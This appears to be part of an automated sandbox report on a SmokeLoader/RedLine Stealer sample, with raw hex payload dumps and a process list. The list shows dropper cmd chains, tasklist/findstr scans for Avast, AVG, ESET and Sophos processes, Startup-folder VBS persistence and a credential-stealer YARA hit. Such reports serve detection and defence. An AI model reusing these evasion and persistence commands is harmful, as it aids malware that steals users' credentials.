                                                                                                                                                                                2024-12-30 18:45:55 UTC8000INData Raw: 41 6c 6d 49 00 99 d5 80 7c ab fc 70 92 cd f3 7c 66 28 ba a0 af bc 41 b2 15 f8 3d a3 bc 24 c4 9c 61 a0 82 5e 28 a1 71 b1 c6 1c cc 11 0b 0b ca e5 f4 cb 44 c8 b2 97 eb ce 63 c3 a6 70 ae 9c e7 59 c4 03 0f 08 0b 65 65 f6 b4 ca 58 fd 72 e1 21 24 f2 79 19 3d 27 6a 36 3e 7c ce 52 d2 21 0e f2 b5 10 33 f2 19 51 f1 12 0e c4 7d e0 f0 8d ab 9a 1c 22 7e ec bc 49 e8 a7 0d d6 02 15 10 59 1f cd 9c df 11 dc 3f 4c 47 1b 03 a9 c5 06 13 16 70 ed 15 ac 08 f7 44 44 b5 7a f3 f2 19 66 ed 2f b4 c5 41 75 1b e3 0e 78 29 d7 dd bd a9 31 5f 5e da 49 ce 7d d0 e8 d7 70 af 37 21 30 15 e9 be a3 4b 51 b0 3d 17 a0 5f 9a 45 8b 99 b5 9e 9c 7b a6 a4 f5 5b d9 ba 28 77 60 6e b7 81 87 49 b6 88 35 2d 94 65 dc 96 c4 4f 0c bd 0d a2 14 b5 a4 a3 f5 14 4d e2 01 12 a8 37 02 e0 1a a3 2b 01 b9 04 01 3f 3b
                                                                                                                                                                                Data Ascii: AlmI|p|f(A=$a^(qDcpYeeXr!$y='j6>|R!3Q}"~IY?LGpDDzf/Aux)1_^I}p7!0KQ=_E{[(w`nI5-eOM7+?;
                                                                                                                                                                                2024-12-30 18:45:55 UTC8000INData Raw: 52 7d 67 74 32 8e 7a 9e 28 ea 60 9f 1f f9 e3 ef b0 a6 61 a4 f2 4f ef 4d 82 92 fd c6 66 a1 3d b4 8a ae 5d 3b 1b 03 7b 61 40 3e a9 48 ce 0c 25 b0 f1 40 a8 2a e8 7e 54 9c 50 ff 80 79 8f 99 10 fc d6 a8 90 50 ca 02 b4 d9 d5 9e b9 9d fe c7 5e a7 f0 1b f0 26 c2 8a 91 90 0c df e4 60 9b cb dc f1 39 ea e2 79 80 76 14 fa 62 b9 5a 04 ed b0 84 98 95 f2 a8 74 d4 a7 72 e0 d3 61 4d 28 70 bf 00 7e 65 e6 b3 ee bf e4 60 97 ed af 86 ed 4f 27 af b3 82 e7 c6 6e 79 3a a1 7f 2b 53 06 31 2e a3 e6 9c 94 42 ea a3 60 4e cb 64 95 15 60 46 3c 9d b6 40 88 d0 99 74 a8 21 bc b1 d1 09 63 57 27 2f 62 af 7a 51 7a 27 43 31 99 a1 d1 fe 5e 36 3e d3 df 03 c6 81 34 55 a2 43 15 2f 34 ff 72 51 3b 76 42 b7 a2 2a ec 0b 88 d3 7a 84 a7 aa 69 ac dd db 54 30 13 5b 0f ae fb 94 95 29 d0 1a be f4 7f 1e db
                                                                                                                                                                                Data Ascii: R}gt2z(`aOMf=];{a@>H%@*~TPyP^&`9yvbZtraM(p~e`O'ny:+S1.B`Nd`F<@t!cW'/bzQz'C1^6>4UC/4rQ;vB*ziT0[)
                                                                                                                                                                                2024-12-30 18:45:55 UTC8000INData Raw: bf 1b 7d 52 9a dd 1e d8 68 bb 4c 21 a2 cc 91 bf ea 19 00 47 08 4b f1 bb 40 ae 4d b6 3d 3d ae 22 fa c9 d2 41 ab 98 8f 05 5d 10 5e 28 53 61 23 a2 9c 93 72 f4 eb 42 12 d7 ac 51 5d 3c c7 47 51 e5 de 63 69 09 48 c5 54 88 91 88 a3 5f dd ac 20 f9 0e 35 c2 0f 08 33 70 68 1f 59 19 f5 9d 14 e4 89 d4 19 18 7c da f2 f3 dd b6 f1 f8 85 05 4c 63 6e 6e 12 3d 41 fe c7 7c ed 0e 36 e6 58 c5 5c 52 a5 fe df 75 04 10 87 ca 40 98 16 43 aa 29 b2 ad d3 52 ab ca b4 df 10 a9 8d 6e 48 77 23 49 ad 43 c8 d3 e8 aa 05 b3 db c2 84 85 09 2b 58 25 e4 12 01 eb bd 30 99 39 b1 31 95 06 11 2d 50 5d 6e 3d 31 d3 69 2b 9e 9a 22 5e 82 7a 79 25 cb 75 11 ec df a7 ca 33 26 e4 d8 b8 e9 25 f9 20 fc 6b 54 f2 6d cd e4 1d 18 62 71 23 15 dd 65 9c ef d9 f8 86 2a 68 6d 39 19 cf 29 5b 4f e8 9f a3 af 70 72 26
                                                                                                                                                                                Data Ascii: }RhL!GK@M=="A]^(Sa#rBQ]<GQciHT_ 53phY|Lcnn=A|6X\Ru@C)RnHw#IC+X%091-P]n=1i+"^zy%u3&% kTmbq#e*hm9)[Opr&
                                                                                                                                                                                2024-12-30 18:45:55 UTC8000INData Raw: 9d df 52 3b 2e f1 83 c0 32 1d 4f e8 e7 bd 60 02 87 e6 79 ad c3 61 15 91 38 56 12 7b 9b a1 b2 e7 2f ad e3 3f 98 72 d6 83 9a 8a c9 c3 16 9a b1 32 b3 bc dc d9 60 0b 83 c4 5c 4b fa 3f e6 04 c7 a3 72 6d 79 58 d6 db 8c 30 4a 4b 66 0e 5c 39 cf c4 cd 71 05 38 8a 2c 72 ed b3 10 20 75 17 8d 22 df 88 7a 68 95 ca bd d9 f7 ca ed ac 58 f9 17 36 e2 4a a4 7c 42 69 96 9f 81 6a 6f c0 60 02 72 08 aa aa c8 ad 74 e5 c2 ee 03 a3 bb b1 3d b6 ac f6 e5 b3 fe 54 2a 4a 33 db ba ef c8 2a e7 b0 61 b0 ee 7e 35 9d d5 60 81 e2 be 9b 7d de 77 26 93 8b 49 4e d9 79 e6 da 40 c0 30 94 e4 2b 4a 72 ce dd 01 41 99 53 85 e8 28 5f c2 c6 62 e1 62 df 90 36 71 3b 80 24 44 04 82 c0 b5 6e 51 17 50 92 44 96 99 65 a1 8a 2c a3 ad b3 15 d3 02 7e 34 be 02 73 73 81 0d 21 37 f4 14 3f ee 7f a2 fb 5c 4b 76 f1
                                                                                                                                                                                Data Ascii: R;.2O`ya8V{/?r2`\K?rmyX0JKf\9q8,r u"zhX6J|Bijo`rt=T*J3*a~5`}w&INy@0+JrAS(_bb6q;$DnQPDe,~4ss!7?\Kv
                                                                                                                                                                                2024-12-30 18:45:56 UTC8000INData Raw: 99 75 e1 42 d0 3e 32 0b d9 bf 67 17 61 de c3 bf 3f 64 ef 0c 72 93 55 57 2a 4c 57 08 bf 75 77 89 e4 d9 b3 21 43 cc b3 1c 23 c9 26 78 dc 85 55 76 12 1a fc 73 60 3f 75 e1 d0 e3 20 d7 17 6a b9 24 b6 d2 2b fc 80 84 04 c4 4b 77 38 f4 d4 a7 92 69 18 9b a3 95 a1 20 b4 a1 dc 47 1b de 4d 8f 0d 7e 96 f7 b5 8f 3d f5 51 ab 5c ca e9 9d 7e 2e 62 b0 83 00 3a 50 34 67 8a 51 a5 ef d2 f4 9a b7 e4 80 ff 65 5a 06 a2 29 24 57 6d 90 12 a9 ca 2e c1 e8 0e 9a 31 0b 7e f0 dc fe a4 16 34 bb 1c 7e 24 40 b7 5d 9e c5 4c 21 e2 29 8e ee 37 b4 2c a2 c5 80 b9 d8 5c d4 f3 d0 bc 57 8c 44 04 3d c6 ab aa d4 9f 98 65 06 28 44 a5 35 fb e8 32 07 e3 4d 66 e9 9b 7b 01 d6 a4 44 44 44 96 32 d5 8d c9 91 05 03 00 92 a8 08 c1 0c f5 71 a6 ae 31 7a 73 f1 08 89 51 43 fe db 67 67 ed 2f dd 50 1c f1 2a eb ac
                                                                                                                                                                                Data Ascii: uB>2ga?drUW*LWuw!C#&xUvs`?u j$+Kw8i GM~=Q\~.b:P4gQeZ)$Wm.1~4~$@]L!)7,\WD=e(D52Mf{DDD2q1zsQCgg/P*
                                                                                                                                                                                2024-12-30 18:45:56 UTC8000INData Raw: cf f1 e7 56 83 f9 66 a6 45 fd 17 98 0b cf bc ab 55 3d 62 44 00 0e ec a1 3f 4e d2 43 b5 51 85 7c 09 ce 61 34 bd 9b 52 ac 92 b8 d2 8e 68 04 ec 42 8b 55 04 1f 2f fd aa d3 74 2d 66 da b4 71 f4 64 69 59 79 5f 7f a6 93 36 d6 e5 a4 b6 b6 80 9a 6c fa 8a f9 3e bc 08 ff a9 82 1b 73 bc 94 fb 8f c7 8e 59 23 39 7b 2c c7 54 76 25 bb 58 81 b0 da d1 78 64 3c 23 66 69 1d ba a1 77 e7 6c 0b 6c b4 49 8e 80 35 c3 53 51 c6 b7 91 4f 8c b5 f1 48 e9 05 96 96 8f d9 4b 58 43 e1 84 a6 f1 15 8c 71 16 1b 1a 54 2a 39 31 9a 54 18 28 f9 43 a3 5f 4e 70 c8 2a fe c6 6d 94 7d ea 62 a0 36 15 35 21 ce 0c a2 f5 eb 55 1c 17 f8 74 12 da be 9a 67 b9 8c af 12 03 6b 7b 41 e2 90 1c a5 55 6f 5c 4c 4c b9 2e 1c 9c a9 67 d7 e1 f9 c9 28 26 1d 13 35 d5 48 af c9 36 e6 0d 53 19 6c bc 24 16 f5 30 fe 4a bb 7b
                                                                                                                                                                                Data Ascii: VfEU=bD?NCQ|a4RhBU/t-fqdiYy_6l>sY#9{,Tv%Xxd<#fiwllI5SQOHKXCqT*91T(C_Np*m}b65!Utgk{AUo\LL.g(&5H6Sl$0J{
                                                                                                                                                                                2024-12-30 18:45:56 UTC8000INData Raw: be 20 18 7c 2c 77 08 c5 83 26 35 36 93 d4 1b 6f d8 85 65 7f e9 16 3c 5c f7 d7 ea 6b 9b b1 ce 80 ac 40 2e eb 7a 52 6b fb 7e 16 b6 18 d4 0d 31 8c b5 07 93 e4 bb e5 b6 4f a4 ca a1 46 e1 b7 68 ff 5f 7d 70 af 66 30 7e b3 3b 15 29 da c2 a1 f3 01 38 b7 21 50 23 a1 3f 41 6e 58 a7 ed e8 e5 05 dd 27 3b 8e aa 38 6c 39 e5 e3 c6 3c ef 52 39 6e 5c 5d da 26 d8 12 3d e5 2e c8 a2 46 0e be 63 c4 60 5e b0 ba c7 4e dd 52 8c 97 8d b6 d4 08 9a 90 7d db d3 f6 36 43 8d a2 f7 4b 56 0b 86 39 98 56 f5 8e f0 37 8f 96 b8 0f 4d 63 a9 dc 29 12 9d c2 ca 08 b8 6c 64 2c 5d a3 69 d0 66 27 fd c0 e9 ff 08 21 b3 02 3b 24 3b 2c 35 4f 29 59 69 4c aa 5d 5f ee da 0a 31 c1 25 2a 40 fc c4 cf 80 bf 62 2e be 4d 67 fa c0 2c cf 15 c4 48 55 a0 44 24 59 31 b7 41 db 19 7d 3a 79 51 48 f2 05 37 82 cf eb 34
                                                                                                                                                                                Data Ascii: |,w&56oe<\k@.zRk~1OFh_}pf0~;)8!P#?AnX';8l9<R9n\]&=.Fc`^NR}6CKV9V7Mc)ld,]if'!;$;,5O)YiL]_1%*@b.Mg,HUD$Y1A}:yQH74
                                                                                                                                                                                2024-12-30 18:45:56 UTC8000INData Raw: 3d cf d7 58 b3 db b6 4d db 25 6f 88 2e 71 c1 d0 a5 89 59 dd 09 c9 b1 b5 b5 c8 9c 48 2a 21 4d 1e d2 5a 16 15 5f af 4f d2 84 a9 3c 3e 41 97 c1 01 b4 e0 a0 77 01 dc de 2d 71 e7 68 7c b7 ab 3a d4 b8 3b c5 90 82 8b e0 bd ae 8e 49 25 95 e8 a9 c9 7f 95 3f fb b8 2e 0c 31 67 46 a1 27 84 91 77 69 ca a6 19 54 74 2e b9 e2 6e 35 3b b8 80 ba 36 04 f8 fc f9 ec 5e 9d b0 71 02 03 11 91 63 11 b9 0d 82 10 b9 9c 43 47 d2 3e c7 48 cd 3b 9b 00 0f 68 e9 c2 d8 fc e5 47 4d d5 6d af 90 99 f9 40 2f ae 37 25 eb ca e1 48 3b 8d 8c 03 1c 5b 60 e6 b5 e7 06 97 34 96 a3 fc 66 b9 41 f8 a0 e1 3b fb 37 78 3c 75 1d 01 09 06 aa 64 ec 04 f3 b0 84 12 b8 cb 5b 49 fc d5 b5 1b 57 c9 5f be cc 92 78 e3 f2 2c 8c f6 73 56 2d 71 d2 a6 60 ba f7 fe bf 00 8b 67 98 17 e7 1d 89 f5 e9 ea e0 2e 7a 11 4a 6d 81
                                                                                                                                                                                Data Ascii: =XM%o.qYH*!MZ_O<>Aw-qh|:;I%?.1gF'wiTt.n5;6^qcCG>H;hGMm@/7%H;[`4fA;7x<ud[IW_x,sV-q`g.zJm


                                                                                                                                                                                Statistics

                                                                                                                                                                                CPU Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                Memory Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                Behavior

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                System Behavior

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:0
                                                                                                                                                                                Start time:13:41:53
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Users\user\Desktop\hoEtvOOrYH.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\hoEtvOOrYH.exe"
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:231'424 bytes
                                                                                                                                                                                MD5 hash:2A270773553CFDCA5C1FDBF24D44F18C
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1732204208.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1732453969.0000000002471000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1732453969.0000000002471000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1732280470.00000000008AA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1732336579.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1732336579.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:1
                                                                                                                                                                                Start time:13:42:00
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                Imagebase:0x7ff72b770000
                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:5
                                                                                                                                                                                Start time:13:42:20
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\jagvise
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\jagvise
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:231'424 bytes
                                                                                                                                                                                MD5 hash:2A270773553CFDCA5C1FDBF24D44F18C
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1983884104.0000000000A28000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1983794099.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1983794099.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1983746430.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1983822753.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1983822753.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 61%, ReversingLabs
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:7
                                                                                                                                                                                Start time:13:45:16
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\A723.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\A723.exe
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:7'286'372 bytes
                                                                                                                                                                                MD5 hash:3B3D41663F63FF253217889380CDE23F
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 71%, ReversingLabs
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:8
                                                                                                                                                                                Start time:13:45:17
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c copy Birth Birth.cmd && Birth.cmd
                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:9
                                                                                                                                                                                Start time:13:45:17
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:10
                                                                                                                                                                                Start time:13:45:34
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:tasklist
                                                                                                                                                                                Imagebase:0x90000
                                                                                                                                                                                File size:79'360 bytes
                                                                                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:11
                                                                                                                                                                                Start time:13:45:34
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:findstr /I "wrsa opssvc"
                                                                                                                                                                                Imagebase:0xe60000
                                                                                                                                                                                File size:29'696 bytes
                                                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:12
                                                                                                                                                                                Start time:13:45:38
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\3E6C.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\3E6C.exe
                                                                                                                                                                                Imagebase:0xa40000
                                                                                                                                                                                File size:1'401'856 bytes
                                                                                                                                                                                MD5 hash:22059CF3BA4B5338116E054D63DBCB46
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.3947321786.0000000003027000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.4116101719.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 39%, ReversingLabs
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:13
                                                                                                                                                                                Start time:13:45:43
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                Imagebase:0x9e0000
                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:14
                                                                                                                                                                                Start time:13:45:49
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\C3F.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\C3F.exe
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:1'160'471 bytes
                                                                                                                                                                                MD5 hash:53C60D599AA498ED4EFA79BA0B12E29F
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 13%, ReversingLabs
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:15
                                                                                                                                                                                Start time:13:45:51
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmd
                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:16
                                                                                                                                                                                Start time:13:45:51
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:17
                                                                                                                                                                                Start time:13:45:52
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbs"
                                                                                                                                                                                Imagebase:0x7ff71e800000
                                                                                                                                                                                File size:170'496 bytes
                                                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:18
                                                                                                                                                                                Start time:13:45:52
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:tasklist
                                                                                                                                                                                Imagebase:0x90000
                                                                                                                                                                                File size:79'360 bytes
                                                                                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:19
                                                                                                                                                                                Start time:13:45:52
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                Imagebase:0xe60000
                                                                                                                                                                                File size:29'696 bytes
                                                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:20
                                                                                                                                                                                Start time:13:45:53
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Result.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Result.exe"
                                                                                                                                                                                Imagebase:0xa10000
                                                                                                                                                                                File size:1'401'856 bytes
                                                                                                                                                                                MD5 hash:22059CF3BA4B5338116E054D63DBCB46
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 39%, ReversingLabs
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:21
                                                                                                                                                                                Start time:13:45:59
                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                Wow64 process (32bit):
                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                Imagebase:
                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                Has exited:false

